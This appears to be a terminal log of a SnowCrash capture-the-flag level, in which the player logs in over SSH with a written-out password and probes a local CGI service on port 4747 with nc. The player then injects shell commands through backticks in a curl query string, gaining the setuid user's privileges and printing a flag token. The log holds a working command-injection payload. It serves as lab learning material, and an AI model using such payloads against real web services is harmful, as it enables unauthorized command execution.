┌──$ [~/42/2020/snow-crash]
└─>  ssh 192.168.1.64 -p 4242 -l level04
level04@192.168.1.64's password: qi0maab88jeaj46qoumi7maus
level04@SnowCrash:~$ ls -l
total 4
-rwsr-sr-x 1 flag04 level04 152 Mar  5  2016 level04.pl
# Verbose port scan for listening daemons, without sending any data to them.
level04@SnowCrash:~$ nc -zv localhost 4747
Connection to localhost 4747 port [tcp/*] succeeded!
level04@SnowCrash:~$ nc localhost 4747
GET / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 27 Jan 2021 07:27:57 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1
Connection: close
Content-Type: text/html
level04@SnowCrash:~$ curl localhost:4747/?x="\`/usr/bin/whoami\`"
flag04
level04@SnowCrash:~$ curl localhost:4747/?x="\`/bin/getflag\`"
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
